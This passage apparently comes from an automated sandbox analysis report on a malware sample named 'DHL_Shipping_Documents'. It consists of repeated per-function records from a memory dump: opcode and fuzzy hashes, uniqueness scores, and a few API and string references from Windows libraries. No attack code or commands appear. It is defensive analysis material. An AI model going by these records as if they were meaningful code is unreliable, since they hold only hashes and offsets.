Instruction ID: 5e3c1b9e88a2151f8292034e1cf008e7590e489aff5449f25ffbba29964859b4
Opcode Fuzzy Hash: 274c6da7c58d7318bd995d50fa3924c54ba859393b7c7061c65ef0c1c296511a
Instruction Fuzzy Hash: 0CD05E305010018FDF178B88C901A2D76B0FB12601B020598A501AA135C334E801C610

Uniqueness

Uniqueness Score: -1.00%

Function 014E0200 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a51fb9a7edfb4f30b775e48456de62e3c28e79e1d112d76bb5101b6f764d5470
Instruction ID: dba8ca0a13986c4c63558b5c480ab612daa56e6e96d9d57c04d1ab0ccba229bc
Opcode Fuzzy Hash: a51fb9a7edfb4f30b775e48456de62e3c28e79e1d112d76bb5101b6f764d5470
Instruction Fuzzy Hash: 63D0E935352984CFD61BCB5DC9A4B1673E8BB44B45FC50590E501CB766E6BCDD44CA10

Uniqueness

Uniqueness Score: -1.00%

Function 0150C6C0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfc0a70dacb65b22f007059e1fb4bd130192091d30a84b7b135318cff9c7699e
Instruction ID: 9493761a115c08b2b044fe5181ee32c031a4a120c9b7b356072040947a085084
Opcode Fuzzy Hash: bfc0a70dacb65b22f007059e1fb4bd130192091d30a84b7b135318cff9c7699e
Instruction Fuzzy Hash: E4C01232150644AFC7129E99CD01F017BA9E768B00F000061F20547571C531E810D644

Uniqueness

Uniqueness Score: -1.00%

Function 014F0260 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 6707120fb09a661232fd1cda59d1f7d2b86705c8ed35a10d03add7c8bfc393df
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: F4D0123A100248EFCB11DF41C850D5A776BFBE8710F10801EFD19077518A31ED63DA50

Uniqueness

Uniqueness Score: -1.00%

Function 014D06B0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8b97c53bfc5e9dbe76a9e1ca40c38a3ff3ebc84f5e60dc1c4a6e002f038d50b
Instruction ID: a505a8ac5117357d52066941990b0b5b8c5b2e85d637fe6a53642a26fa3afde9
Opcode Fuzzy Hash: c8b97c53bfc5e9dbe76a9e1ca40c38a3ff3ebc84f5e60dc1c4a6e002f038d50b
Instruction Fuzzy Hash: 11C0483A701A51CFCF16CF6BD688F0937E4FB59751F1508D1E80ACBB22E624E820CA60

Uniqueness

Uniqueness Score: -1.00%

Function 01586BC0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
Instruction ID: 85820d0ae0a2a3bbc0d49e3329e22bc6a5800210e99917af4bf26252655a0f46
Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
Instruction Fuzzy Hash: DCC09B1F1556C549CE179F3553127E4BF60D7425D4F1D14C5D4D21F513C11C4513D625

Uniqueness

Uniqueness Score: -1.00%

Function 015A4A6D Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3915e9b27a6dedf30be2ece7ff89b9ecc7ef9fa9516cf1cdc6566a40dfafed51
Instruction ID: aa226c9bdbb471babc94574ada970422a33d952248859dce3a410717e475966a
Opcode Fuzzy Hash: 3915e9b27a6dedf30be2ece7ff89b9ecc7ef9fa9516cf1cdc6566a40dfafed51
Instruction Fuzzy Hash: 95B01231212541CFC7026721CB00F1832B9BF116C0F0D00B8670085430DA2CC810D501

Uniqueness

Uniqueness Score: -1.00%

Function 01514320 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d2c212e1452964e7d30daa6f685577fd47a8313bac807c7fde6d2a600f89024
Instruction ID: 360e056c7275c37b90b81faa79a4abae813d821c01d5aab94faa388df1d6afcb
Opcode Fuzzy Hash: 5d2c212e1452964e7d30daa6f685577fd47a8313bac807c7fde6d2a600f89024
Instruction Fuzzy Hash: 23900232A1111012D150759858056464585B7E1351B51C411E051495CCCE5489955361

Uniqueness

Uniqueness Score: -1.00%

Function 01514630 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96458618a0253ebc919d783b805d7cc9dbdf38f7e7593976524af5ac553a9e6e
Instruction ID: bea9069fdf6744ae1b780c36225729a9be70d1bf0bea471f5632d17470a05405
Opcode Fuzzy Hash: 96458618a0253ebc919d783b805d7cc9dbdf38f7e7593976524af5ac553a9e6e
Instruction Fuzzy Hash: B3900262A111104241607298480540654C6B7E1315391C511E0554964CCB5888D55365

Uniqueness

Uniqueness Score: -1.00%

Function 01512B40 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 402534be6ed2e18f213160729475b8fa91c70bf0416ce909f285370fd5bd0c0c
Instruction ID: 13abaef1519aefb472441d64a831f4e9104a3690184f2a1f557c1e0796d6d06b
Opcode Fuzzy Hash: 402534be6ed2e18f213160729475b8fa91c70bf0416ce909f285370fd5bd0c0c
Instruction Fuzzy Hash: 0E90023261101802D114619848056860485A7D1311F51C411E6024A59EDBA588D17231

Uniqueness

Uniqueness Score: -1.00%

Function 01512B60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e244e735c3560d5365a6f4471d46ac3005472acfad035e6ed6b83e2e4f806417
Instruction ID: 435d6c225987f0c384b441cbc1e94fd8d48dbc0343205b0c5e74dbf3c58c732a
Opcode Fuzzy Hash: e244e735c3560d5365a6f4471d46ac3005472acfad035e6ed6b83e2e4f806417
Instruction Fuzzy Hash: B3900232A1501802D160719844157460485A7D1311F51C411E0024A58DCB958A9577A1

Uniqueness

Uniqueness Score: -1.00%

Function 01512BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6779b97c814ba9536e60540e6237457095a5854932eae86e1763080ca0fffc43
Instruction ID: 3fbbac78f971ce3d961c106209224ae3f54a35f2692c1f82a71765f26c4124af
Opcode Fuzzy Hash: 6779b97c814ba9536e60540e6237457095a5854932eae86e1763080ca0fffc43
Instruction Fuzzy Hash: 6590023261505842D15071984405A460495A7D1315F51C411E0064A98DDB658D95B761

Uniqueness

Uniqueness Score: -1.00%

Function 01512A70 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 325eb418239cd0978fb8f407517f24ef72924541e485e0bf93c4cdf049800d03
Instruction ID: 3ac103d1b03a1c9b3a3ae5cd73981ddcb89766d55c1dc3e0d36b65058886339a
Opcode Fuzzy Hash: 325eb418239cd0978fb8f407517f24ef72924541e485e0bf93c4cdf049800d03
Instruction Fuzzy Hash: 829002A2611150924510A2988405B0A4985A7E1211B51C416E1054964CCA6588919235

Uniqueness

Uniqueness Score: -1.00%

Function 01512AB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab06ebf246b4851a8f45ee230cde73a3612269de249d9dbe7d491513a52e39fa
Instruction ID: 5f23b9e12b9aa225baf05bfcf281880833bf5e1fcc4b0c53008089a1af922862
Opcode Fuzzy Hash: ab06ebf246b4851a8f45ee230cde73a3612269de249d9dbe7d491513a52e39fa
Instruction Fuzzy Hash: EB900226631010020155A598060550B08C5B7D7361391C415F1416994CCB6188A55321

Uniqueness

Uniqueness Score: -1.00%

Function 01512D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e2ab98d5323d65a0e99000f9adf4557ac9a6e68923f852a22f3ff11a9313c89
Instruction ID: 7d8f704aa2852c9403c37f99e1dd2b059682dd605fcd7ea81c069ba608ec602b
Opcode Fuzzy Hash: 8e2ab98d5323d65a0e99000f9adf4557ac9a6e68923f852a22f3ff11a9313c89
Instruction Fuzzy Hash: 0B90023265101402D151719844056060489B7D1251F91C412E0424958ECB958A96AB61

Uniqueness

Uniqueness Score: -1.00%

Function 01512DF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1eaf3963a6353246a5b1b4bf9e591c1c6fdc3f161c90355e3107bf2de8648b4
Instruction ID: 24f579dcaf8ec548b7a17e05087125ae07275145864f484afe3e047c5ceb8512
Opcode Fuzzy Hash: e1eaf3963a6353246a5b1b4bf9e591c1c6fdc3f161c90355e3107bf2de8648b4
Instruction Fuzzy Hash: 0A90022271101402D112619844156060489E7D2355F91C412E1424959DCB658993A232

Uniqueness

Uniqueness Score: -1.00%

Function 01512C20 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b358eb93708a4c072b870d469e20361a46c4bb8984fb066c216f520faabae9e
Instruction ID: 84f3c424cdd850f4efcdccfc121555300a1e8a047999524ec20747e19f58af64
Opcode Fuzzy Hash: 0b358eb93708a4c072b870d469e20361a46c4bb8984fb066c216f520faabae9e
Instruction Fuzzy Hash: 2F90023261101842D11061984405B460485A7E1311F51C416E0124A58DCB55C8917621

Uniqueness

Uniqueness Score: -1.00%

Function 01512CC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8190a1cdcc11e15e547800dc862f6ca04a1aab621718efc6f5943a18b09e5476
Instruction ID: 864502b3bcf9c2d683b0f282d0bf7adacb465bf60c170d6893bc37af91a569e4
Opcode Fuzzy Hash: 8190a1cdcc11e15e547800dc862f6ca04a1aab621718efc6f5943a18b09e5476
Instruction Fuzzy Hash: 7190022261505442D11065985409A060485A7D1215F51D411E1064999DCB758891A231

Uniqueness

Uniqueness Score: -1.00%

Function 01512C80 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fe864710f82676c48d7cb7cc621f163d652e7aa4196cdfe3817403a9fbabc56
Instruction ID: b936645a89f129b750dc7e0a62e3200c04265245cac8daaa0de7cf4e1cf64e28
Opcode Fuzzy Hash: 9fe864710f82676c48d7cb7cc621f163d652e7aa4196cdfe3817403a9fbabc56
Instruction Fuzzy Hash: C8900222A1501402D150719854197060495A7D1211F51D411E0024958DCB998A9567A1

Uniqueness

Uniqueness Score: -1.00%

Function 01512CB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ffde087d398fa614448767c104da8c194bdeb6ff719af6142c7c23afe3e0d74
Instruction ID: 2bc9f130c168ff90b3dda42d3215eef057a0008da0f2e8458c944f94c9f04158
Opcode Fuzzy Hash: 1ffde087d398fa614448767c104da8c194bdeb6ff719af6142c7c23afe3e0d74
Instruction Fuzzy Hash: 7B90023261101403D110619855097070485A7D1211F51D811E042495CDDB9688916221

Uniqueness

Uniqueness Score: -1.00%

Function 01512F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8809999262f2efa476aba794fe1dd541bad80a563e4209c7a4356ba58a3d30a
Instruction ID: 5dd2a07ef37eae46842779162e5a4d3231fc1b4c2c2a5cd7e7cb603daa11a619
Opcode Fuzzy Hash: a8809999262f2efa476aba794fe1dd541bad80a563e4209c7a4356ba58a3d30a
Instruction Fuzzy Hash: F990023261141402D110619848097470485A7D1312F51C411E5164959ECBA5C8D16631

Uniqueness

Uniqueness Score: -1.00%

Function 01512F20 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52e4e46aa8aa8ca18c29d83c26a92d62aa17e724005a939f8b3f4e616237bb99
Instruction ID: 043398506208d53b7f20ced9563be9a03e3b04909b53781d17a8912b5a02c626
Opcode Fuzzy Hash: 52e4e46aa8aa8ca18c29d83c26a92d62aa17e724005a939f8b3f4e616237bb99
Instruction Fuzzy Hash: FB90026262101042D1146198440570604C5A7E2211F51C412E2154958CCA698CA15225

Uniqueness

Uniqueness Score: -1.00%

Function 01512FD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4cb6fdd168bb753340d75817d894c3c47c00b6c3f68a495ee56e5aaa27b026d
Instruction ID: d29ba3019990c7bd45a8aac6e40961a47b1f124b23e955091e38c3dc1f8ee870
Opcode Fuzzy Hash: a4cb6fdd168bb753340d75817d894c3c47c00b6c3f68a495ee56e5aaa27b026d
Instruction Fuzzy Hash: F490022261145442D15062984805B0F4585A7E2212F91C419E4156958CCE5588955721

Uniqueness

Uniqueness Score: -1.00%

Function 01512EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd7538bd1537ac7935e15032a6e69d18ad8d759aabd9244a426dbe68b4658e08
Instruction ID: a43c0450b6296a0815d5ca235fdf12a47cde16f75f0ae71c77f7b399df025bc4
Opcode Fuzzy Hash: fd7538bd1537ac7935e15032a6e69d18ad8d759aabd9244a426dbe68b4658e08
Instruction Fuzzy Hash: 0390026261141403D150659848056070485A7D1312F51C411E2064959ECF698C916235

Uniqueness

Uniqueness Score: -1.00%

Function 01513050 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 117d53f0a8cb4c1422054d3b7c9c4834ebdf7299ee4cf1fc1821958fd28d42a1
Instruction ID: a992377ed2f00d6d1d06b79eb65d1d884b6d3016ec32c359cf0227b8dbb75777
Opcode Fuzzy Hash: 117d53f0a8cb4c1422054d3b7c9c4834ebdf7299ee4cf1fc1821958fd28d42a1
Instruction Fuzzy Hash: 7F90022265101802D150719884157070486E7D1611F51C411E0024958DCB5689A567B1

Uniqueness

Uniqueness Score: -1.00%

Function 01513590 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d8f9eea0158df0694ee6426daedd1ae686a82924dcaea9bd50be2e04617d639
Instruction ID: 80fb3041fb1bbb6bc6b9d42debf7f7ad22637f2be6d3c3625cfcf6f2f81b3244
Opcode Fuzzy Hash: 0d8f9eea0158df0694ee6426daedd1ae686a82924dcaea9bd50be2e04617d639
Instruction Fuzzy Hash: E190023261115442D510A19844057061495A7D1211F51C811E142496CECBA58991A262

Uniqueness

Uniqueness Score: -1.00%

Function 01513980 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74576ff98b81c6fa0e3000cc8e3ae20919251b5f75b14c7df8abd64eadb833c5
Instruction ID: 7cb816b5858c324db7246d22d19bf8b63c1d3d3a5677bded1652724517a614af
Opcode Fuzzy Hash: 74576ff98b81c6fa0e3000cc8e3ae20919251b5f75b14c7df8abd64eadb833c5
Instruction Fuzzy Hash: A1900222A5905142D160719C44157164485B7E2221F51C421E0414998CCA9589956361

Uniqueness

Uniqueness Score: -1.00%

Function 01513D40 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 831a62182b82168da22afcea43c396127e2f9fce5a566f779bb5be3e510827b7
Instruction ID: fb0fb0156ad55f6ba1e54f35544333a51be58b3a17f511eb2002354d17a6ea70
Opcode Fuzzy Hash: 831a62182b82168da22afcea43c396127e2f9fce5a566f779bb5be3e510827b7
Instruction Fuzzy Hash: 5B90023271101402D510719858156460496A7D1311F51D835E042495CDCB9488A26221

Uniqueness

Uniqueness Score: -1.00%

Function 01513CE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ea5a8e856b920bc7b8c3ecab2b296197520c65818685b5861ee9dd8de639e82
Instruction ID: 58772f042fc186f83d1a1d8d576e47fc78b1111bf5c2e32ad8c184204a180e85
Opcode Fuzzy Hash: 2ea5a8e856b920bc7b8c3ecab2b296197520c65818685b5861ee9dd8de639e82
Instruction Fuzzy Hash: 1090023261101086951062DDA805A4A4585A7E1311F51D416E0014958CCA5488A15221

Uniqueness

Uniqueness Score: -1.00%

Function 01512BC0 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: a52626fa6fb3b3006cc189edb990a0db307c7568516f95d0cf196f875ac62c40
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01512850 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 015128FC
___swprintf_l.LIBCMT ref: 0151291E
___swprintf_l.LIBCMT ref: 01512963
___swprintf_l.LIBCMT ref: 0154A414

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 0154A434
::%hs%u.%u.%u.%u, xrefs: 0154A40D
:%u.%u.%u.%u, xrefs: 0154A49E
ffff:, xrefs: 0154A3EA

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 9eff0dacf46f53a00519dcc53e945876fead1eb4f17e25e0fc1b63ae54f26e46
Instruction ID: ea503fa53042a7dcc9d00ebb716c38096d1e6d3d5e429c47039e28ad2281951d
Opcode Fuzzy Hash: 9eff0dacf46f53a00519dcc53e945876fead1eb4f17e25e0fc1b63ae54f26e46
Instruction Fuzzy Hash: 1F51E9B6A002567FEB12DF9C889097EF7B8BB48244B60C62AF455DB645D374DE40C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 015820E0 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01582176
___swprintf_l.LIBCMT ref: 015821B2
___swprintf_l.LIBCMT ref: 0158224D
___swprintf_l.LIBCMT ref: 01582273
___swprintf_l.LIBCMT ref: 01582298
___swprintf_l.LIBCMT ref: 015822D8

Strings

::%hs%u.%u.%u.%u, xrefs: 0158216E
:%u.%u.%u.%u, xrefs: 015822CF
ffff:, xrefs: 0158214D, 0158216D
::ffff:0:%u.%u.%u.%u, xrefs: 015821AA

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 681ab01410ae17a60eb9506783aa26f65b206e05e4fa8a3790bdca40a081782f
Instruction ID: 81688e06f9f3c432995f00b04ee8dea660766af82fec55566f4c6a2ccaf68a00
Opcode Fuzzy Hash: 681ab01410ae17a60eb9506783aa26f65b206e05e4fa8a3790bdca40a081782f
Instruction Fuzzy Hash: 6451D979A006466EDB20EF9DCC8097EBBF9BB85200F14C85DE5D6EB681D674EA40C760

Uniqueness

Uniqueness Score: -1.00%

Function 015075F0 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

ExecuteOptions, xrefs: 01544586
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015445E2
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 0154453B
CLIENT(ntdll): Processing section info %ws..., xrefs: 0154466D
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01544628
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 0154460B
Execute=1, xrefs: 015445F9

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 7318382ac256179ac5575ce4fb8b1f20104e227272907a6ff7af2498d8af8f85
Instruction ID: 88eca146c70ed512384238fa27ed89b96950ad9fdbe8b1cb08134220993f7d2d
Opcode Fuzzy Hash: 7318382ac256179ac5575ce4fb8b1f20104e227272907a6ff7af2498d8af8f85
Instruction Fuzzy Hash: 84514C3160021AABEF22AED8DC95BED77A8FF58704F140599D606AF1C0DB70AE458F60

Uniqueness

Uniqueness Score: -1.00%

Function 015A6600 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1038376649.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_14a0000_DHL_Shipping_Documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a656f7b237b6c7dc51ada09d2ac08d484b713800fb41be17a573fe29c41fbb6d
